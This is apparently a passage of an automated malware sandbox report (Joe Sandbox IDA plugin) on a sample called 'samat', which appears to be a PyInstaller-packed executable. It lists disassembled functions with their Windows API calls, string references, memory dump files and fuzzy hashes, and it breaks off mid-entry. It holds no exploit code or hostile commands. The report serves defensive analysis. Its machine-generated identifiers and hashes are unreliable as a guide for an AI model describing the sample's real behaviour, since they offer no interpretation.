FreeLibrary.KERNEL32(?,?,?,00007FF7E12DF0AA,?,?,-00000018,00007FF7E12DAD53,?,?,?,00007FF7E12DAC4A,?,?,?,00007FF7E12D5F3E), ref: 00007FF7E12DEE8C
GetProcAddress.KERNEL32(?,?,?,00007FF7E12DF0AA,?,?,-00000018,00007FF7E12DAD53,?,?,?,00007FF7E12DAC4A,?,?,?,00007FF7E12D5F3E), ref: 00007FF7E12DEE98

Strings

api-ms-, xrefs: 00007FF7E12DEDD6
ext-ms-, xrefs: 00007FF7E12DEDE9

Memory Dump Source

Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true

Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd

Similarity

API ID: AddressFreeLibraryProc
String ID: api-ms-$ext-ms-
API String ID: 3013587201-537541572
Opcode ID: 113d78e4ddfca44ef7199ea688f338981f8b4522c7c5ddaba00381c3941a83e2
Instruction ID: 1b650c0e31b8721e017b0af88d963a610a528f0ca67c809660a10f3d39ba552e
Opcode Fuzzy Hash: 113d78e4ddfca44ef7199ea688f338981f8b4522c7c5ddaba00381c3941a83e2
Instruction Fuzzy Hash: A641F722B1960241EB16EB16DC02775A299BF49BA0FC9453BDD1D57384DFBCE405C326

Function 00007FF7E12C36B0 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 61
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameW.KERNEL32(?,00007FF7E12C3804), ref: 00007FF7E12C36E1
GetLastError.KERNEL32(?,00007FF7E12C3804), ref: 00007FF7E12C36EB

Part of subcall function 00007FF7E12C2C50: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF7E12C3706,?,00007FF7E12C3804), ref: 00007FF7E12C2C9E
Part of subcall function 00007FF7E12C2C50: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF7E12C3706,?,00007FF7E12C3804), ref: 00007FF7E12C2D63
Part of subcall function 00007FF7E12C2C50: MessageBoxW.USER32 ref: 00007FF7E12C2D99

Strings

Failed to resolve full path to executable %ls., xrefs: 00007FF7E12C3739
\\?\, xrefs: 00007FF7E12C375A
Failed to convert executable path to UTF-8., xrefs: 00007FF7E12C3790
Failed to obtain executable path., xrefs: 00007FF7E12C36F3
GetModuleFileNameW, xrefs: 00007FF7E12C36FA

Memory Dump Source

Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true

Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd

Similarity

API ID: Message$CurrentErrorFileFormatLastModuleNameProcess
String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
API String ID: 3187769757-2863816727
Opcode ID: 7a7bb6314ef99d1ea6b5a99dff4d55fbb7227be169d5ba9e119ffda366a0a745
Instruction ID: 971a2f209c4a8f0fc8bffeea66a44aced6b79d9d314c46b23a61a96cf6deef61
Opcode Fuzzy Hash: 7a7bb6314ef99d1ea6b5a99dff4d55fbb7227be169d5ba9e119ffda366a0a745
Instruction Fuzzy Hash: 8C219651B1854241FB25B724EC063B6A258BF84354FC08133E75E825D5EEBCE108C322

Function 00007FF7E12DBA5C Relevance: 10.8, APIs: 7, Instructions: 290
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7E12DBE89

Memory Dump Source

Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true

Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 1c0df5e74df0118619baac061aee596465bcef498cfc928fc9eaa168a483e3b3
Instruction ID: e7d519d65b728c48832a4c23c7b796c3002ee6340edb93491681c20126f4e3bd
Opcode Fuzzy Hash: 1c0df5e74df0118619baac061aee596465bcef498cfc928fc9eaa168a483e3b3
Instruction Fuzzy Hash: BFC1E423B0C68695E760AB15D8163BDAB58FB86B80FD54133EA4D03791CEFEE4458723

Function 00007FF7E12C8570 Relevance: 10.6, APIs: 7, Instructions: 63
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 00007FF7E12C8590
OpenProcessToken.ADVAPI32 ref: 00007FF7E12C85A3
GetTokenInformation.KERNELBASE ref: 00007FF7E12C85C8
GetLastError.KERNEL32 ref: 00007FF7E12C85D2
GetTokenInformation.KERNELBASE ref: 00007FF7E12C8612
ConvertSidToStringSidW.ADVAPI32 ref: 00007FF7E12C862E
CloseHandle.KERNEL32 ref: 00007FF7E12C8646

Memory Dump Source

Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true

Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd

Similarity

API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
String ID:
API String ID: 995526605-0
Opcode ID: 1c88e2159774aae00215e56fe2a2a719af09135261df6dbcfc7a62e4558c2eb4
Instruction ID: 8bc466157fc79f4e4760f11b050d3a7fb52429372c27907ffbf0425d94d04ff1
Opcode Fuzzy Hash: 1c88e2159774aae00215e56fe2a2a719af09135261df6dbcfc7a62e4558c2eb4
Instruction Fuzzy Hash: AC217331B0C64246EB10AB55F94532AE7A8FF817A0F918237EA6C83AE4DEFDD445C711

Function 00007FF7E12C90E0 Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 64
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF7E12C8570: GetCurrentProcess.KERNEL32 ref: 00007FF7E12C8590
Part of subcall function 00007FF7E12C8570: OpenProcessToken.ADVAPI32 ref: 00007FF7E12C85A3
Part of subcall function 00007FF7E12C8570: GetTokenInformation.KERNELBASE ref: 00007FF7E12C85C8
Part of subcall function 00007FF7E12C8570: GetLastError.KERNEL32 ref: 00007FF7E12C85D2
Part of subcall function 00007FF7E12C8570: GetTokenInformation.KERNELBASE ref: 00007FF7E12C8612
Part of subcall function 00007FF7E12C8570: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF7E12C862E
Part of subcall function 00007FF7E12C8570: CloseHandle.KERNEL32 ref: 00007FF7E12C8646

LocalFree.KERNEL32(?,00007FF7E12C3C55), ref: 00007FF7E12C916C
LocalFree.KERNEL32(?,00007FF7E12C3C55), ref: 00007FF7E12C9175

Strings

D:(A;;FA;;;%s), xrefs: 00007FF7E12C9157
S-1-3-4, xrefs: 00007FF7E12C9121
D:(A;;FA;;;%s)(A;;FA;;;%s), xrefs: 00007FF7E12C9142
Security descriptor string length exceeds PYI_PATH_MAX!, xrefs: 00007FF7E12C9183

Memory Dump Source

Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true

Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd

Similarity

API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PYI_PATH_MAX!
API String ID: 6828938-1529539262
Opcode ID: 5ed7a9ba3e6ce910408607b93085540bd422a8d0f9e00f9f84049ca226c14b37
Instruction ID: 395dd86bfe94c07938228bacbb809f435052dff1d1ec76479bf52faa911c552e
Opcode Fuzzy Hash: 5ed7a9ba3e6ce910408607b93085540bd422a8d0f9e00f9f84049ca226c14b37
Instruction Fuzzy Hash: 4E213021B0864282EB11BB10EC163EAA259FF84780FC54437EA4E57795DFBCD545C761

Function 00007FF7E12C7E20 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 81COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNELBASE(00000000,?,00007FF7E12C352C,?,00000000,00007FF7E12C3F23), ref: 00007FF7E12C7F32

Strings

\, xrefs: 00007FF7E12C7E97
%s%c, xrefs: 00007FF7E12C7EA4
%.*s, xrefs: 00007FF7E12C7EEB

Memory Dump Source

Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true

Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd

Similarity

API ID: CreateDirectory
String ID: %.*s$%s%c$\
API String ID: 4241100979-1685191245
Opcode ID: 302ffdc47f1f131389ecc473fe7ae023bae846d875cccfc6523225b15fd92315
Instruction ID: 9a4e7b05101842aef7faa12c2d713a7c4cedb021190bbde38b64aaf5e32ed831
Opcode Fuzzy Hash: 302ffdc47f1f131389ecc473fe7ae023bae846d875cccfc6523225b15fd92315
Instruction Fuzzy Hash: 1431C321719AC645EB61AB20EC523EAA258EF84BE0F844232EB6D477C9DE7CD601C711

Function 00007FF7E12DCF60 Relevance: 6.2, APIs: 4, Instructions: 218COMMON

Download Yara Rule

APIs

GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E12DCF4B), ref: 00007FF7E12DD07C
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E12DCF4B), ref: 00007FF7E12DD107

Memory Dump Source

Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true

Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd

Similarity

API ID: ConsoleErrorLastMode
String ID:
API String ID: 953036326-0
Opcode ID: a47a8d54e36ced6583969bea4ac316e5fdc1f02f5f342ddc714eca2f45cad1a1
Instruction ID: c5de0c1b016dee6c47ffbce7ae589440efd151e77c4f1596e05190f260b07dbd
Opcode Fuzzy Hash: a47a8d54e36ced6583969bea4ac316e5fdc1f02f5f342ddc714eca2f45cad1a1
Instruction Fuzzy Hash: C491C523F18A5646F760AF65D8423BDABA8EB40788F94413BDE0E566C5CFB8D441C722

Function 00007FF7E12DF98C Relevance: 6.2, APIs: 4, Instructions: 162COMMON

Download Yara Rule

APIs

_get_daylight.LIBCMT ref: 00007FF7E12DFA7C
_get_daylight.LIBCMT ref: 00007FF7E12DFA8D
_get_daylight.LIBCMT ref: 00007FF7E12DFA9E
_isindst.LIBCMT ref: 00007FF7E12DFB69

Memory Dump Source

Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true

Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd

Similarity

API ID: _get_daylight$_isindst
String ID:
API String ID: 4170891091-0
Opcode ID: 873197461a12b50781dd6dd2a54ab0b7f590f407db75148e336b6c99fa373a01
Instruction ID: af7e52b8bf652f0943a9ff1549d97317046fe9f25e8a1db069cdcf1377013d55
Opcode Fuzzy Hash: 873197461a12b50781dd6dd2a54ab0b7f590f407db75148e336b6c99fa373a01
Instruction Fuzzy Hash: 95511673F042118AEB14EF64DD527FCA7A9AB4835CF900236DD1E52AE5EB78A803C715

Function 00007FF7E12D577C Relevance: 6.1, APIs: 4, Instructions: 119pipeCOMMON

Download Yara Rule

APIs

GetFileType.KERNELBASE ref: 00007FF7E12D57AF
GetFileInformationByHandle.KERNELBASE ref: 00007FF7E12D5811
GetLastError.KERNEL32 ref: 00007FF7E12D58A2
PeekNamedPipe.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E12D56B4), ref: 00007FF7E12D58EE

Memory Dump Source

Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true

Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd

Similarity

API ID: File$ErrorHandleInformationLastNamedPeekPipeType
String ID:
API String ID: 2780335769-0
Opcode ID: f2931e55a17fed7c801103cab28c1f7fd047901bf7fa79ea6702d423310ad099
Instruction ID: 68d407348311a22b462f5e677f37e7a4871fb1f43063355b534e63c4c1ebbdaf
Opcode Fuzzy Hash: f2931e55a17fed7c801103cab28c1f7fd047901bf7fa79ea6702d423310ad099
Instruction Fuzzy Hash: C1519263F046418AF710EF70D8523BDA7B9BB48758F908436DE0D97688DFB8D4808762

Function 00007FF7E12D5628 Relevance: 6.1, APIs: 4, Instructions: 90fileCOMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7E12D5655
CreateFileW.KERNELBASE ref: 00007FF7E12D5694
CloseHandle.KERNEL32 ref: 00007FF7E12D56C9

Memory Dump Source

Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true

Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd

Similarity

API ID: CloseCreateFileHandle_invalid_parameter_noinfo
String ID:
API String ID: 1279662727-0
Opcode ID: 8f3d5377b4ca72f71b0fe910297a4b2920b1cd85568e136600ee028e7f718979
Instruction ID: e07611010984c9507fef69f2c8b75ea74036e99cd747d787f63fc1a18644f364
Opcode Fuzzy Hash: 8f3d5377b4ca72f71b0fe910297a4b2920b1cd85568e136600ee028e7f718979
Instruction Fuzzy Hash: 2941A363E1878187F714AB20E911369A264FB943A4F509336E69C03AD5DFFCA5E08751

Function 00007FF7E12CCC3C Relevance: 4.6, APIs: 3, Instructions: 94COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7E12CCE0C: __scrt_dllmain_crt_thread_attach.LIBCMT ref: 00007FF7E12CCE20

__scrt_acquire_startup_lock.LIBCMT ref: 00007FF7E12CCC60
__scrt_release_startup_lock.LIBCMT ref: 00007FF7E12CCCCE
__scrt_get_show_window_mode.LIBCMT ref: 00007FF7E12CCD21

Memory Dump Source

Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true

Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd

Similarity

API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
String ID:
API String ID: 3251591375-0
Opcode ID: b3dd18574e8b698ea28c35ed35ed65a6730a16d6ac14c38d0a8ba428da0d66bc
Instruction ID: 958985c6d6ec0a8b3db471f2ef67f5c222c36460162f58a3485d614efc59f2ee
Opcode Fuzzy Hash: b3dd18574e8b698ea28c35ed35ed65a6730a16d6ac14c38d0a8ba428da0d66bc
Instruction Fuzzy Hash: 83310821F0854741EB15BB659C233B99689AF81344FC85037EA0E572D7DEFDA914C363

Function 00007FF7E12D9A30 Relevance: 4.5, APIs: 3, Instructions: 14COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,?,00007FF7E12D9A2C), ref: 00007FF7E12D9A41
TerminateProcess.KERNEL32(?,?,?,00007FF7E12D9A2C), ref: 00007FF7E12D9A4C
ExitProcess.KERNEL32 ref: 00007FF7E12D9A5B

Memory Dump Source

Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true

Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 148d460979eed4a43ebbf671c65dc2dc638c0d89c9c01e8e00358d5495882c84
Instruction ID: 4e9ade2ef335731114cf6dcd232dc74199ce15689346e746a6c7639da1021e9a
Opcode Fuzzy Hash: 148d460979eed4a43ebbf671c65dc2dc638c0d89c9c01e8e00358d5495882c84
Instruction Fuzzy Hash: 26D06712B0874642EF553B709C5727892596F48711B94543AD80B4A393DDBDA8494263

Function 00007FF7E12D013C Relevance: 3.2, APIs: 2, Instructions: 177COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7E12D0180
_invalid_parameter_noinfo.LIBCMT ref: 00007FF7E12D0277

Memory Dump Source

Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true

Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 2fd4b9cf4e2c203a215f80a0453bc9b94d2a0e119ef729a2f51343e3c0f92604
Instruction ID: f0755f2c32e9bafdd37f79b70449d6df1b209dd39095ff0845914522cdaa6ba7
Opcode Fuzzy Hash: 2fd4b9cf4e2c203a215f80a0453bc9b94d2a0e119ef729a2f51343e3c0f92604
Instruction Fuzzy Hash: F3512E23B0924186E764BA35DC0677EE198BF44BA4F944B32DD6D0B7E5CEBCD4018626

Function 00007FF7E12DC134 Relevance: 3.0, APIs: 2, Instructions: 46COMMONLIBRARYCODE

Download Yara Rule

APIs

SetFilePointerEx.KERNELBASE(?,?,?,?,?,00007FF7E12DC2CD), ref: 00007FF7E12DC180
GetLastError.KERNEL32(?,?,?,?,?,00007FF7E12DC2CD), ref: 00007FF7E12DC18A

Memory Dump Source

Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true

Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: 7d52f85de62641260209e8dbb28c5e1251e01e8bf24b4306ce9dcd9badf2c9c6
Instruction ID: ca4881f2439b6a0db14825e5b2976e72329e4b77d3a2dc183c218889a977bddc
Opcode Fuzzy Hash: 7d52f85de62641260209e8dbb28c5e1251e01e8bf24b4306ce9dcd9badf2c9c6
Instruction Fuzzy Hash: E911E222708A9281DB20AB25EC01269E365BB41FF4F944336EE7D077D8CEBCD0508701

Function 00007FF7E12D5924 Relevance: 3.0, APIs: 2, Instructions: 40timeCOMMON

Download Yara Rule

APIs

FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E12D5839), ref: 00007FF7E12D5957
SystemTimeToTzSpecificLocalTime.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E12D5839), ref: 00007FF7E12D596D

Memory Dump Source

Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true

Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd

Similarity

API ID: Time$System$FileLocalSpecific
String ID:
API String ID: 1707611234-0
Opcode ID: 497c6f3b45805196ef8f930e068bad9451f3f50de380bc241881b145e929bf5b
Instruction ID: 4e8ab9bb02cc0683afc6f00cb121f9b139e493fd4fa681e6e1c3fca734843079
Opcode Fuzzy Hash: 497c6f3b45805196ef8f930e068bad9451f3f50de380bc241881b145e929bf5b
Instruction Fuzzy Hash: FB118F6270C64282EB54AB24E85227AF774FB85771F900237FA9D819D8EFBCD414DB21

Function 00007FF7E12DA948 Relevance: 3.0, APIs: 2, Instructions: 19memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(?,?,?,00007FF7E12E2D22,?,?,?,00007FF7E12E2D5F,?,?,00000000,00007FF7E12E3225,?,?,?,00007FF7E12E3157), ref: 00007FF7E12DA95E
GetLastError.KERNEL32(?,?,?,00007FF7E12E2D22,?,?,?,00007FF7E12E2D5F,?,?,00000000,00007FF7E12E3225,?,?,?,00007FF7E12E3157), ref: 00007FF7E12DA968

Memory Dump Source

Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true

Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd

Similarity

API ID: ErrorFreeHeapLast
String ID:
API String ID: 485612231-0
Opcode ID: 46e6024f15a2f57ad5ff64688e0fe3cec5898f8577aba2f63b046adc8766ef53
Instruction ID: 384b13feaabc76cbe0be76cd1237357d11771de89fb7f0a53847a95effb6927e
Opcode Fuzzy Hash: 46e6024f15a2f57ad5ff64688e0fe3cec5898f8577aba2f63b046adc8766ef53
Instruction Fuzzy Hash: E1E08611F0924243FF057BF1DC4B37992586F94700FC44437C80D822A1DDBC68418332

Function 00007FF7E12DAB58 Relevance: 2.6, APIs: 2, Instructions: 59COMMON

Download Yara Rule

APIs

